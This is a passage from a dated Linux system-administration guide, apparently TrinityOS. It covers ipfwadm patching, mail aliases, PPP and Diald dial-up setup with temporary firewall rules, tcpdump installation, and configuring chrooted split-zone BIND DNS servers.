0.0.0.0 255.0.0.0 U 3584 0 0 lo 0.0.0.0 100.200.0.1 0.0.0.0 UG 1500 16384 0 eth0 -- Also, in a pinch, if you need an example of how to address a NIC, say eth1 in Redhat-speak, here is how you do it: /etc/sysconfig/network-scripts/ifcfg-eth1 -- DEVICE=eth1 IPADDR=192.168.0.1 NETMASK=255.255.255.0 NETWORK=192.168.0.0 BROADCAST=192.168.0.255 ONBOOT=yes BOOTPROTO=none -- ================================================================================ Section 17 - Patching, Compiling, and installing IPFWADM NOTE: This is only needed for 2.0.x kernels. 2.2.x kernel users will need to use IPCHAINS which usually already installed in modern distrobutions. It can also be found at a URL in [Section 5] - FTP the ipfwadm source code tgz or RPM file to "/usr/src/" - Un-compress the IPFWADM tgz file ("tar -xzvf ipfwadm-2.3.0.tgz") or install the RPM file ("rpm -i ipfwadm-2.3.0-1.i386.rpm") Note: If you already installed IPFWADM and the above RPM installation didn't work, don't worry, the stock IPFWADM that comes with Redhat will work ok. - FTP the IPFWADM timeout patch to /usr/src/ipfwadm-2.3.0 - Un-compress the IPFWADM patch ("gunzip ipfwadm-2.3.0-generic-timeout.patch.gz") - Apply the timeout patch "patch -p0 < ipfwadm-2.3.0-generic-timeout.patch" - Make sure that all "Hunks Succeed" - Edit the "ipfwadm.c" file - At line 107, insert this line: #include - Compile IPFWADM by doing: "make" "make install" ================================================================================ Section 18 - Mail aliases for system administration /etc/aliases - If you rarely login as root but you do login to another account often, redirect your "root" mail to that address. To do this, change the line towards the bottom of the file NOTE: If you want to have this email goto MULTIPLE email addresses, #'ed out the following line and then create the file ~root/.forward. In this file, put all of the desired to-be-forwarded email addresses in this file (one email address per line). Edit the /etc/aliases file and insert the following lines just about the "root" lien towards the bottom if you have YOUR OWN DOMAIN and run these services: -- #If you have your own domain name and run DNS hostmaster: root #If you run a WWW site webmaster: root #If you have your own domain and run email servers postmaster: root abuse: root root: your-email-address -- Now compile up the new alias database by running the command "newaliases" If you get a warning about duplicated, remove the duplicate lines and re-run "newaliases" NOTE: If you are running a older version of Sendmail.. I could tell you how to fix your aliasing issues BUT.. I'm going to make you upgrade! There are so many security issues with older versions of Sendmail that its just not worth it. ================================================================================ Section 19 - Preparing for reboot and clearing the logs - For trouble shooting, do the following: Slackware: "mv /var/adm/messages /var/adm/messages.old" "touch /var/adm/messages" "mv /var/adm/syslog /var/adm/syslog.old" "touch /var/adm/syslog" "mv /var/adm/debug /var/adm/debug.old" "touch /var/adm/debug" Redhat: "mv /var/log/messages /var/log/messages.old" "touch /var/adm/messages" "mv /var/log/syslog /var/log/syslog.old" "touch /var/log/syslog" "mv /var/log/debug /var/log/debug.old" "touch /var/log/debug" - Reboot with the new kernel - Once the computer has rebooted, look at the /var/adm/messages and /var/adm/syslog files to make sure no errors or problems were found. If there were errors.. fix them before you continue. ================================================================================ Section 20 - Verifing MASQ module installation If you setup IP Masq, make sure that the MASQ modules have loaded. - make sure all of the IP MASQ modules are running by typing in "lsmod" - You will see the following: roadrunner:/usr/src/ppp-2.2.0g# lsmod Module: #pages: Used by: ip_masq_raudio 1 0 ip_masq_quake 1 0 ip_masq_irc 1 0 ip_masq_ftp 1 0 bsd_comp 1 0 ** If you don't see *ALL* of these, check your /etc/rc.d/rc.modules and try loading them manually by doing "./etc/rc.d/rc.modules" ================================================================================ Section 21 - Install TCPDUMP TCPDUMP is loaded by default in most modern Linux distributions. If it isn't installed, you can get it from the URL in [Section 5] TCPDUMP-- - Download "libpcap" and do the following commands: "configure" "make" "make install" "make install-man" "make install-incl" "cp libpcap/bpf/net/* /usr/include/net" - Download "tcpdump" and do the following commands: "configure" "make" "make install" "make install-man" - Now run "tcpdump" and watch it fly. Look at TCPDUMP's man page as you can send captures to a file, filter the traffic to only stuff you care upon based on source IP, destination IP, ports, UDP, TCP, etc.. ================================================================================ Section 22 - PPPd configuration [For both PRIMARY and BACKUP PPP connections] This PPP section is intended for MANUAL PPP connections for both: - users to configure PPPd to dial out to the Internet as their PRIMARY link - users to configure PPPd to dial out to the Internet as a BACKUP link *************************************************************************************** ** On-Demand PPP connections are provided by Diald in a different TrinityOS section. ** ** ** ** Yes, PPPd does offer on-demand functionality but it isn't as flexible as Diald ** *************************************************************************************** First, regardless of your PPP use, you have a PPP enabled kernel running. This is fully described in [Section 12] ----- Notes for people thinkink of using Multi-Link PPP (ML/PPP) for multiple connections to the same remote site: As of 01/22/00, the ML/PPP code is moving quite well. Some are patches to PPPd whiles others are not. Most patches are only for 2.2.x kernels and have issues. Here is an email I receive about one user's view: -- From Charles @ chas@pcscs.com >This link: http://mp.mansol.net.au/ > is not available as of the time of this mailing. > > It does, however, have functional mods for kernels 2.2.13 and 2.2.14. I > have worked with the 2.2.13 kernel and have been pleased with the > functionality, but I would say that the code is not ready for production > machines as there are still latency issues as well as overhead issues with > 3 or more links in a bundle- at least from my observations. With 3 lines, > the latency was jumping from 150ms to 750ms. With 2 lines, the latency > was smoother with ranges of 150ms to 300ms, but rarely perfect. > > There are also > fault tolerance issues with automated link resets and bundling. If one > maintains the individual links manually, however, this is a functional > solution, but by no means an installation which you can walk away from for > long periods of time and guarantee fault tolerance. Novell's NIAS is still > the best I have seen in these regards as it meets the demands if high load > in both large and small packet fills. > > For Linux, Chris Pascoe's code is by far the most evolved code I have seen. > He shows great promise of mature code in a relatively short period of time. > He has also shown integration with the ppp daemon and ppp kernel > architecture to be an effective way for doing asynchronous analog and > synchronous adapter-based MLPPP. There are rumors and controversy with > regards to modifying Linux PPP's architecture altogether to streamline > features of MLPPP, asynchronous analog and synchronous PPP links for better > uniformity. In my opinion, however, Chris' technique is going to be more > compatible for hardware functionality than an architectural PPP rebuild > that reduces feature modularity in its design. > > As far as the final production stuff: > If you want performance, you are going to need features such as data and/or > VJ header compression for PPP packets. I haven't seen Linux code support that > yet. I also haven't seen Linux code handle link bundling perfectly yet. > Links seem to add well and some links can even go down, but there are still > issues with the 1st link going down causing the whole bundle to need to be > reset via killall pppd. These refinements, I'm sure, will be last on the > "TO DO" list and will probably be quite some time before they are properly > implemented, nevertheless, Linux does in fact now support MLPPP. >>I also haven't seen Linux code handle link bundling perfectly yet. >>Links seem to add well and some links can even go down, but there are >>still issues with the 1st link going down causing the whole bundle to need to >>be reset via killall pppd. These refinements, I'm sure, will be last on >>the "TO DO" list and will probably be quite some time before they are >>properly implemented, nevertheless, Linux does in fact now support MLPPP. ----- Anyway, for you Normal PPP users, here is the TrinityOS setup. /etc/ppp/chat.your-ppp-isp -- ABORT BUSY ABORT 'NO CARRIER' "" ATZ OK ATM0S11=40 OK ATDT5551212 CONNECT "" -- Fix its permissions: chmod 600 /etc/ppp/chat.your-ppp-isp -- /etc/ppp/pap-secrets * your-ppp-login your-ppp-password -- Fix its permissions: chmod 600 /etc/ppp/pap-secrets /etc/ppp/options -- # MTU settings will greatly effect your performance, please read up # on calculating MTU settings from my PPP web page. # # This setup is optimized for file transfers and NOT for interactive # traffic like telnet, talk, etc # # 14.4k modem users: 296 # 28.8/33.6k modem users: 470 # IP Masq users (regardless of speed): 1500 # Masq users: If you get a lot of "MASQ: failed TCP/UDP checksum for # xxx.xxx.xxx.xxx" errors, turn off VJ header compression # by do the the following: # # -vj #pppd v2.3.x PAP config require-pap #Get a dynamic IP address. If you have a static IP addres, put # the static IP address in the LEFT hand address space 0.0.0.0:0.0.0.0 asyncmap 0 lock #Use Hardware flow control crtscts #BSDComp is a more modern compression method than "deflate" bsdcomp 15,15 lcp-restart 1 ipcp-restart 1 defaultroute #Enable these for debugging #debug #kdebug 1 user your-ppp-login -- Fix its permissions: chmod 600 /etc/ppp/options /usr/local/sbin/startppp -- #!/bin/sh # # NOTE: This configuration assumes that your modem is on COM2 # echo Killing any stray PPPD processes killall pppd killall chat echo Begining PPP negotiation.. #Replace /dev/ttyS1 with your modem's COMM port.. remember, always start #counting with "0". Also.. make SURE that the paths for pppd/chat are #in /usr/sbin. If not, change this command line to use the correct path #Old pppd v2.2.x format #New pppd v2.3.x format /usr/sbin/pppd /dev/ttyS1 38400 crtscts -d lock defaultroute connect '/usr/sbin/chat -v -t 45 -f /etc/ppp/chat.your-ppp-isp' & -- Fix its permissions: chmod 600 /usr/local/sbin/startppp /usr/lib/ppp/stopppp -- #!/bin/sh # # NOTE: This configuration assumes that your modem is on COM2 # echo Shutting down PPP # #Replace /dev/ttyS1 with your modem's COMM port.. remember, always start #counting with "0". Also.. make SURE that the paths for pppd/chat are #in /usr/sbin. If not, change this command line to use the correct path /usr/lib/ppp/pppd /dev/ttyS1 disconnect echo Killing any stray PPPD processes killall chat killall pppd -- Fix its permissions: chmod 600 /usr/local/sbin/stopppp Primary PPP users using Strong Firewalls: ----------------------------------------- If you are using the strong firewall rulesets (IPFWADM/IPCHAINS), you will need to re-run your firewall ruleset everytime you get your dynamic IP address. To do this: - Edit or create the file called /etc/ppp/ip-up and in it put: -- #!/bin/sh /etc/rc.d/rc.firewall #OPTIONAL: Its nice to be able to update your system # clock when on-line. To do this, add these # lines, un # them out, and then follow the # instructions in TrinityOS [Section 26] # # /usr/local/bin/getdate -- - now fix the perms on it: chmod 700 /etc/ppp/ip-up Thats IT! Backup PPP links: If you are like me, you either have a locked up ADSL or Cablemodem connection to the Internet. Well, from time to time, your connection will go down for various reasons and you'll be SOL for Internet access. What can you do? Setup a backup PPP link! Currently, the config shown below will need to be invoked MANUALLY. It is my plan that once I received my ISDN line, I will develope an AUTOMATIC dial-backup configuration based upon a series of connectivity criteria that will be put into the Diald section of TrinityOS. NOTE: This ruleset is OLD and isn't nearly are secure as the new IPCHAINS ruleset. I hope to port a strong IPCHAINS ruleset here soon. NOTE: When your primary link goes down, your old /etc/rc.firewall ruleset will NOT let you out. So, you need to enter in the following files to bring-up and bring-down a temporary firewall. /etc/ppp/ip-up -- #!/bin/sh echo "Starting /etc/ppp/ip-up" # ----------------------------------------------------------------------------------- # NOTE: This short firewall script is for IPFWADM (2.0.x kernels) to only allow # SSH, DNS, and NTP in or out of the PPP0 connection. If you need additional # connectivity, go ahead and add them in. # #Specification of the LOOPBACK interface loopback="127.0.0.1" #Specification of the INTERNAL NIC intif="eth1" #The IP address on your INTERNAL nic intip="192.168.0.1" #IP network address of the INTERNAL net intnet="192.168.0.0" #IP address of an internal host that should have IPPORTFW forward traffic to portfwip="192.168.0.20" #Specification of the EXTERNAL NIC # # PPP Users: If you are using the Dynamic PPP "extif" script from above, # make sure to comment the below line out so it doesn't override it. # # If you want to use the PPPd variables, change this to read: # extif="$1" # extif="ppp0" #The IP address you get from the Internet # # PPP users: If you are getting dynamic address, either use the "extip" script # from the header above or if you want to use the PPPd variables, # change this to read: # extip="$3" # extip="100.200.0.212" #The IP broadcast address of the external net # # PPP users: If you are getting dynamic address, use the the PPPd variables. # Change "extbroad" to read (this make an assuption but it should # be a safe assumption): # extbroad=`echo $4 | cut -d '.' -f 1-3`.255 # extbroad="100.200.0.255" #IP address of the default gateway on the EXTERNAL NIC # # PPP users: If you are getting dynamic address, use the the PPPd variables. # Change "dgw" to read: # dgw=$4 # dgw="100.200.0.1" #IP Mask for ALL IP addresses universe="0.0.0.0" #IP Mask for BROADCAST broadcast="255.255.255.255" #Specification of HIGH IP ports # NOTE: Notice that this STARTS at 1024 and NOT at 1023 which it should. # for some reason SSH sometimes initiates connections at 1023 which # is a TCP violation but shit happens. # unprivports="1024:65535" #Specification of backup DNS server secondarydns="102.200.0.25" #Specifically allowed external host - secure1.host.com securehost="200.211.0.40" # ----------------------------------------------------------------------------------- echo "Change default route to PPP" /sbin/route add default gw $dgw echo "Enabling IP Forwarding.." echo "1" > /proc/sys/net/ipv4/ip_forward echo "Changing IP MASQ Timeouts.." # 2 hrs timeout for TCP session timeouts # 10 sec timeout for traffic after the TCP/IP "FIN" packet is received # 60 sec timeout for UDP traffic (MASQ'ed ICQ users must enable a 30sec # firewall timeout in ICQ itself) /sbin/ipfwadm -M -s 7200 10 60 #Flush all old rulesets echo "Flushing old poicies" /sbin/ipfwadm -I -f /sbin/ipfwadm -O -f /sbin/ipfwadm -F -f #Change default policies echo "Setting default policies to REJECT" /sbin/ipfwadm -I -p reject /sbin/ipfwadm -O -p reject /sbin/ipfwadm -F -p reject echo "Allow SSH DNS through the PPP0 interface" /sbin/ipfwadm -I -i accept -W $extif -P tcp -S $universe/0 -D $extip/32 ssh domain ntp /sbin/ipfwadm -I -i accept -W $extif -P udp -S $universe/0 -D $extip/32 domain echo "Allow ICMP through the PPP0 interface" /sbin/ipfwadm -I -i accept -W $extif -P icmp -S $universe/0 -D $extip/32 echo "Allowing SSH, DOMAIN, and ICMP out" /sbin/ipfwadm -O -i accept -W $extif -P tcp -S $extip/32 $unprivports -D $universe/0 ssh domain ntp /sbin/ipfwadm -O -i accept -W $extif -P udp -S $extip/32 $unprivports -D $universe/0 domain /sbin/ipfwadm -O -i accept -W $extif -P icmp -S $extip/32 -D $universe/0 echo "Masquerade from local net on local interface to anywhere." /sbin/ipfwadm -F -a masquerade -W $extif -S $intnet/24 -D $universe/0 echo "Logging all failed connections" /sbin/ipfwadm -I -a reject -S $universe/0 -D $universe/0 -o /sbin/ipfwadm -O -a reject -S $universe/0 -D $universe/0 -o /sbin/ipfwadm -F -a reject -S $universe/0 -D $universe/0 -o echo "Temporary PPP0 firewall and MASQ Done. -- /etc/ppp/ip-down -- #!/bin/sh # Re-run the master firewall ruleset to reset the firewall back to the primary # interface. /etc/rc.d/rc.firewall # /sbin/route add default gw 24.1.83.1 LOGDEVICE=$6 REALDEVICE=$1 [ -x /etc/ppp/ip-down.local ] && /etc/ppp/ip-down.local $* /etc/sysconfig/network-scripts/ifdown-post ifcfg-${LOGDEVICE} exit 0 -- TroubleShooting: This was sent from a user who had PPP0 running but it would fault.. -- from: Donald Spoon" The Microsoft web-site, and Stroud's Consummate Winlist web-site would literally take MINUTES to load! I had others that exhibited similar behavior, mainly in the *.mil domain, but most sites would load fairly quickly as expected. I played around with the MTU / MRU settings and found an "optimum" set-up for me that helped a great deal, but the "selective" delay in loading certain web sites remained. One day I noticed that when I had brought the PPP link up MANUALLY the affected web-sites loaded normally!! ... I did one more review of your notes and applied the suggestions for re-setting lcp-restart = 1, and ipcp-restart = 1 (from defaults of 3 in the /etc/ppp/options file!. This change alone did the trick for me! -- ================================================================================ Section 23 - Diald [For Modem users only] Diald is a mechanism that will do auto-dialing and auto-PPP negotiations for Linux. Though the newer PPPd code can do this too, Diald allows for much greater flexibility, determine what traffic does/doesn't bring up the line, etc. NOTE: Diald now has a new maintainer and has been updated to v0.98. The the URLs are in [Section 5] +-------------------------------------------------------------------------+ | Follow this link for more information until I can integrate it into the | | TrinityOS doc: | | | | http://www.ecst.csuchico.edu/~dranch/PPP/ppp-performance.html#linux | +-------------------------------------------------------------------------+ Here are a few quick tips: Use dcntrl or diald-top to see what networ traffic is bringing up your PPP/SLIP link. Rough order to get thigns running: ---------------------------------- - /etc/rc.d/rc.S Enabled rc.serial load up - /etc/rc.d/rc.serial /bin/setserial /dev/ttyS1 spd_vhi cp diald.conf /etc/diald diald.conf: -- restrict 16:00:00 20:45:00 * * * down restrict * * * * * mode ppp connect /etc/ppp/diald/earthlink-connect device /dev/cua1 speed 115200 modem lock crtscts local 192.168.1.7 remote 0.0.0.0 dynamic defaultroute accounting-log /var/adm/ppp.log include /usr/local/lib/diald/standard.filter -- In /etc/rc.d/rc.local, add the following line: -- cat "1" > /proc/sys/net/ipv4/ip_dynaddr ================================================================================ Section 24 - DNS: The acquiring, installation, and configuration of both Primary and Secondary servers in a CHROOTed and SPLIT Zone environment The DNS process running the program called "named" is the service that converts the name "www.yahoo.com" to the IP address 204.71.177.71 (one of their MANY TCP/IP addresses). As you might have already figured out, this is a CRITICAL service to run the Internet. You will also notice that TrinityOS supports DNS with options called a "CHROOTed jail" and "Split Zone" files. The CHROOTed feature means is that if some new cracker exploit comes out for the Bind program and a cracker breaks into your box, they will be extreamly limited to what they can and can not do. This is a GOOD thing. This behavior is very similar to the access that an anonymous FTP user gets. The "Split Zone" feature means that there will be (2) named processes running. One will be for the external interface hosting your domain(s) while the other daemon will be for the internal interface for private addressing. This helps protect your internal architecure from people on the Internet. - To setup your own domain, all you need to do is register with the Internic at www.internic.net and pay $70 for 2 years. Then, you need to find another Internet domain that will do SECONDARY DNS for your -primary- DNS server in case your server goes down. The configurations to do both are shown below! * If you would like to read on HOW to get your own domain name and understand some of the new legal issues with Internet domain names, please see the *END* of this section. ---------------------------------------------------------------------------- NOTE: Due to the fact that DNS can make or break the Internet, you should be very sure that any updates, changes, etc submitted to the Internic for your domain is done in a secure fashion. I personally recommend that you do all of your Internic updates via PGP instead of the default "Mail-From" method. Why? The main reason is that email is very easy to forge. Because of this, it would be easy for someone to screw up your domain name, take ownership of it, etc. PGP and GPG for Linux will be covered in a future chapter but until then, I recommend to either use the Windows PGP client or at least use the Internic's "crypt-pw" option. ************************* ** Notes on BIND 4 vs 8: This document is intended for BIND v8.x. The reason for this is because BIND v4.x and it's configuration files are old and now deemed -=* DEAD *=-. Time to upgrade!!! If you are unsure what version you have installed, run "strings /usr/sbin/named | grep named" and look through the results until you find the version number. ************************ *** Security Warning: There is a MAJOR security exploit out there for older versions of Named. Make sure you are running at LEAST v8.2.2p5 or newer or you will be vunerable and getting ROOT access on your box will be EASY! ** I also recommend that ALL users add themselves to the ** BIND-announce email list given in [Section 5] ------------------------------------------------------------------------ Anyway, lets get DNS up and running! - First, download ISC's "named" server code from the URL in [Section 5] and compile it up. Currently, TrinityOS doesn't cover this section but it will at a future date. - Next, do the following for your respective Linux Distribution: Slackware Specific: - Un #'d out the lines in the "/etc/rc.d/rc.inet2" file for "named" Redhat5 Specific: - Make sure that both the files "/etc/rc.d/init.d/named" and "/etc/rc.d/rc3.d/S55named" exists - Now, follow the procedures to create the required chrooted user login, group, and various files and do the required substitutions where required. NOTE: You'll notice that some lines will SEEM to have extra "."s at the end of domain names, etc. LEAVE THEM THERE!! They are CRITICAL! ============================================================================================= Here are the full authoritative configs for Bind v8.1.x (highly recommended over Bind v4.x) ============================================================================================= First, - create the "chroot-dns-ext" group for the CHROOTed EXTERNAL interface groupadd -g 120 chroot-dns-ext - create the "chroot-dns-int" group for the CHROOTed INTERNAL interface groupadd -g 121 chroot-dns-int Next, - create the "chroot-dns-ext" user for the CHROOTed EXTERNAL interface useradd -u 120 -g 120 chroot-dns-ext - create the "chroot-dns-int" user for the CHROOTed INTERNAL interface useradd -u 120 -g 121 chroot-dns-int Now fix the new user directory permissions: chmod 750 /home/chroot-dns-ext chmod 750 /home/chroot-dns-int Next, create the various chroot'ed directories: cd /home/chroot-dns-ext mkdir -p etc lib dev usr/sbin var/named var/run chmod -R 750 /home/chroot-dns-ext mknod -m 666 dev/null c 1 3 cd /home/chroot-dns-int mkdir -p etc lib dev usr/sbin var/named var/run chmod -R 750 /home/chroot-dns-ext mknod -m 666 dev/null c 1 3 Now, we need to put in the required libraries and executable files: cp /lib/libc.so.6 /home/chroot-dns-ext/lib cp /lib/libc.so.6 /home/chroot-dns-int/lib cp /lib/ld-linux.so.2 /home/chroot-dns-ext/lib cp /lib/ld-linux.so.2 /home/chroot-dns-int/lib **NOTE: I first copy and then MOVE the executables into the CHROOT'ed directory. cp /usr/sbin/named /home/chroot-dns-ext/usr/sbin cp /usr/sbin/named-ext /home/chroot-dns-ext/usr/sbin chmod 750 /home/chroot-dns-ext/usr/sbin/named chmod 750 /home/chroot-dns-ext/usr/sbin/named-ext mv /usr/sbin/named /home/chroot-dns-int/usr/sbin mv /usr/sbin/named-ext /home/chroot-dns-int/usr/sbin chmod 750 /home/chroot-dns-int/usr/sbin/named chmod 750 /home/chroot-dns-int/usr/sbin/named-ext Ok, time to create the actual DNS Zone files: First, here is the configuration file for the INTERNAL DNS server: ------------------------------------------------------------------ /home/chroot-dns-int/etc/named.conf -- // /home/chroot-dns-int/etc/named.conf // Config file for a full authoritative DNS server options { //Remember, this is already CHROOTed. /var/named IS correct directory "/var/named"; listen-on port 53 { //You dont want the external interface to listen on this zone 192.168.0.1; 127.0.0.1; }; // Uncommenting this might help if you have to go through a // firewall and things are not working out: // query-source address * port 53; }; zone "." { type hint; file "root.hints.db"; }; zone "0.0.127.in-addr.arpa" { notify no; type master; file "127.0.0.db"; }; zone "192.168.0" { notify no; type master; file "192.168.0.db"; }; zone "0.168.192.in-addr.arpa" { notify no; type master; file "192.168.0-in.addr.db"; allow-transfer {none; }; allow-query {127/8; 192.168.0/24; }; }; -- - Next, you need to create the root.hints.db file like the one shown below. But, like anything else, the Internet's root servers are always changing. So, I recommend you create your OWN copy by running this following command: dig @rs.internic.net . ns > /home/chroot-dns-int/var/named/root.hints.db /home/chroot-dns-int/var/named/root.hints.db -- ; <<>> DiG 8.1 <<>> @rs.internic.net . ns ; (1 server found) ;; res options: init recurs defnam dnsrch ;; got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10 ;; flags: qr rd; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 13 ;; QUERY SECTION: ;; ., type = NS, class = IN ;; ANSWER SECTION: . 5d10h28m15s IN NS M.ROOT-SERVERS.NET. . 5d10h28m15s IN NS L.ROOT-SERVERS.NET. . 5d10h28m15s IN NS K.ROOT-SERVERS.NET. . 5d10h28m15s IN NS J.ROOT-SERVERS.NET. . 5d10h28m15s IN NS B.ROOT-SERVERS.NET. . 5d10h28m15s IN NS F.ROOT-SERVERS.NET. . 5d10h28m15s IN NS G.ROOT-SERVERS.NET. . 5d10h28m15s IN NS C.ROOT-SERVERS.NET. . 5d10h28m15s IN NS H.ROOT-SERVERS.NET. . 5d10h28m15s IN NS A.ROOT-SERVERS.NET. . 5d10h28m15s IN NS D.ROOT-SERVERS.NET. . 5d10h28m15s IN NS E.ROOT-SERVERS.NET. . 5d10h28m15s IN NS I.ROOT-SERVERS.NET. ;; ADDITIONAL SECTION: M.ROOT-SERVERS.NET. 5w6d16h IN A 202.12.27.33 L.ROOT-SERVERS.NET. 5w6d16h IN A 198.32.64.12 K.ROOT-SERVERS.NET. 5w6d16h IN A 193.0.14.129 J.ROOT-SERVERS.NET. 5w6d16h IN A 198.41.0.10 B.ROOT-SERVERS.NET. 5w6d16h IN A 128.9.0.107 F.ROOT-SERVERS.NET. 5w6d16h IN A 192.5.5.241 G.ROOT-SERVERS.NET. 5w6d16h IN A 192.112.36.4 C.ROOT-SERVERS.NET. 5w6d16h IN A 192.33.4.12 H.ROOT-SERVERS.NET. 5w6d16h IN A 128.63.2.53 A.ROOT-SERVERS.NET. 5w6d16h IN A 198.41.0.4 D.ROOT-SERVERS.NET. 5w6d16h IN A 128.8.10.90 E.ROOT-SERVERS.NET. 5w6d16h IN A 192.203.230.10 I.ROOT-SERVERS.NET. 5w6d16h IN A 192.36.148.17 ;; Total query time: 15115 msec ;; FROM: ns.acme123.com to SERVER: rs.internic.net 198.41.0.6 ;; WHEN: Fri Oct 1 03:02:15 1999 ;; MSG SIZE sent: 17 rcvd: 436 -- /home/chroot-dns-int/var/named/127.0.0.db -- @ IN SOA ns.acme123.com. hostmaster.acme123.com. ( 1 ; Serial 8H ; Refresh 2H ; Retry 1W ; Expire 1D) ; Minimum TTL NS ns.acme123.com. 1 86400 PTR localhost. -- /home/chroot-int/var/named/192.168.0.db -- ; ; Zone file for acme123.com ; ; The full zone file ; @ IN SOA ns.acme123.com. hostmaster.acme123.com. ( 1998041301 ; serial, todays date + todays serial # 8H ; refresh, seconds 2H ; retry, seconds 1W ; expire, seconds 1D ) ; minimum, seconds NS ns.acme123.com. ; Inet Address of name server NS 102.200.0.25. ; Inet address of backup server roadrunner-int 86400 A 192.168.0.1 HINFO "a486/160/40M" "Linux 2.0" coyote 86400 A 192.168.0.2 HINFO "iPentium-II/260/64M" "Win95" spare 86400 A 192.168.0.9 HINFO "Unknown" "Unknown" spare2 86400 A 192.168.0.10 HINFO "Unknown" "Unknown" -- /home/chroot-dns-int/var/named/192.168.0-in.addr.db -- @ IN SOA ns.acme123.com. hostmaster.acme123.com. ( 1 ; Serial 8H ; Refresh 2H ; Retry 1W ; Expire 1D) ; Minimum TTL NS ns.acme123.com. 1 86400 PTR roadrunner-int.acme123.com. 2 86400 PTR coyote.acme123.com. 9 86400 PTR spare.acme123.com. 10 86400 PTR spare2.acme123.com. -- Now, here is the configuration file for the EXTERNAL DNS server: ------------------------------------------------------------------ /home/chroot-dns-ext/etc/named.conf -- // /home/chroot-dns-ext/etc/named.conf // Config file for a full authoritative DNS server options { //Remember, this is already CHROOTed. /var/named IS correct directory "/var/named"; //Do NOT have the server listening on localhost or the internal interface listen-on port 53 { 100.200.0.212; }; // Uncommenting this might help if you have to go through a // firewall and things are not working out: // query-source address * port 53; }; zone "." { type hint; file "root.hints.db"; }; zone "acme123.com" { notify yes; type master; file "acme123.com.db"; allow-transfer { 102.200.0.25/32; }; }; zone "212.0.200.100.in-addr.arpa" { notify yes; type master; file "212.0.200.100.db"; allow-transfer { 102.200.0.25/32; }; }; -- - Next, you need to create the root.hints.db file like the one shown below. But, like anything else, the Internet's root servers are always changing. So, I recommend you create your OWN copy by running this following command: dig @rs.internic.net . ns > /home/chroot-dns-ext/var/named/root.hints.db /home/chroot-dns-ext/var/named/root.hints.db -- ; <<>> DiG 8.1 <<>> @rs.internic.net . ns ; (1 server found) ;; res options: init recurs defnam dnsrch ;; got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10 ;; flags: qr rd; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 13 ;; QUERY SECTION: ;; ., type = NS, class = IN ;; ANSWER SECTION: . 5d10h28m15s IN NS M.ROOT-SERVERS.NET. . 5d10h28m15s IN NS L.ROOT-SERVERS.NET. . 5d10h28m15s IN NS K.ROOT-SERVERS.NET. . 5d10h28m15s IN NS J.ROOT-SERVERS.NET. . 5d10h28m15s IN NS B.ROOT-SERVERS.NET. . 5d10h28m15s IN NS F.ROOT-SERVERS.NET. . 5d10h28m15s IN NS G.ROOT-SERVERS.NET. . 5d10h28m15s IN NS C.ROOT-SERVERS.NET. . 5d10h28m15s IN NS H.ROOT-SERVERS.NET. . 5d10h28m15s IN NS A.ROOT-SERVERS.NET. . 5d10h28m15s IN NS D.ROOT-SERVERS.NET. . 5d10h28m15s IN NS E.ROOT-SERVERS.NET. . 5d10h28m15s IN NS I.ROOT-SERVERS.NET. ;; ADDITIONAL SECTION: M.ROOT-SERVERS.NET. 5w6d16h IN A 202.12.27.33 L.ROOT-SERVERS.NET. 5w6d16h IN A 198.32.64.12 K.ROOT-SERVERS.NET. 5w6d16h IN A 193.0.14.129 J.ROOT-SERVERS.NET. 5w6d16h IN A 198.41.0.10 B.ROOT-SERVERS.NET. 5w6d16h IN A 128.9.0.107 F.ROOT-SERVERS.NET. 5w6d16h IN A 192.5.5.241 G.ROOT-SERVERS.NET. 5w6d16h IN A 192.112.36.4 C.ROOT-SERVERS.NET. 5w6d16h IN A 192.33.4.12 H.ROOT-SERVERS.NET. 5w6d16h IN A 128.63.2.53 A.ROOT-SERVERS.NET. 5w6d16h IN A 198.41.0.4 D.ROOT-SERVERS.NET. 5w6d16h IN A 128.8.10.90 E.ROOT-SERVERS.NET. 5w6d16h IN A 192.203.230.10 I.ROOT-SERVERS.NET. 5w6d16h IN A 192.36.148.17 ;; Total query time: 15115 msec ;; FROM: ns.acme123.com to SERVER: rs.internic.net 198.41.0.6 ;; WHEN: Fri Oct 1 03:02:15 1999 ;; MSG SIZE sent: 17 rcvd: 436 -- /home/chroot-dns-ext/var/named/acme123.com.db -- ; ; Zone file for acme123.com ; ; The full zone file ; @ IN SOA ns.acme123.com. hostmaster.acme123.com. ( 1998041301 ; serial, todays date + todays serial # 8H ; refresh, seconds 2H ; retry, seconds 1W ; expire, seconds 1D ) ; minimum, seconds NS ns.acme123.com. ; Inet Address of name server NS 102.200.0.25. ; Inet address of backup server MX 10 mail.acme123.com. ; Primary Mail Exchanger ns 86400 A 100.200.0.212 HINFO "a486/160/40M" "Linux 2.0" mail 86400 CNAME ns ftp 86400 CNAME ns roadrunner 86400 CNAME ns -- /home/chroot-ext/var/named/212.0.200.100.db -- @ IN SOA ns.acme123.com. hostmaster.acme123.com. ( 1998061009 ; Serial, todays date + todays serial 8H ; Refresh 2H ; Retry 1W ; Expire 1D) ; Minimum TTL NS ns.acme123.com. NS 102.200.0.25. 50.0.201.102.in-addr.arpa. IN PTR ns.acme123.com. -- Ok, lets fix the permissions of the files: chown -R chroot-dns-int.chroot-dns-int /home/chroot-dns-int/var/named chown -R chroot-dns-int.chroot-dns-int /home/chroot-dns-int/var/run Ok, time for the glue. You need to change the way that DNS loads the server up to recognize the new layout and to load multiple servers: Redhat users: ------------- Edit /etc/rc.d/init.d/named and find the following changes: first, change the lines: -- [ -f /usr/sbin/named ] || exit 0 [ -f /etc/named.conf ] || exit 0 -- to: -- [ -f /home/chroot-dns-int/usr/sbin/named ] || exit 0 [ -f /home/chroot-dns-ext/usr/sbin/named ] || exit 0 [ -f /home/chroot-dns-int/etc/named.conf ] || exit 0 [ -f /home/chroot-dns-ext/etc/named.conf ] || exit 0 -- Also, you need to setup the following lines to do the actually loading of the two DNS servers: -- start) # Start daemons. echo -n "Starting named-int: " daemon /home/chroot-dns-int/usr/sbin/named -u chroot-dns-int -g chroot-dns-int -t /home/chroot-dns-int RETVAL=$? [ $RETVAL -eq 0 ] && touch /var/lock/subsys/named-int echo -n "Starting named-ext: " #For some reason, this server won't load with the "daemon" line in front #daemon /home/chroot-dns-ext/usr/sbin/named -u chroot-dns-ext -g chroot-dns-ext -t /home/chroot-dns-ext /home/chroot-dns-ext/usr/sbin/named -u chroot-dns-ext -g chroot-dns-ext -t 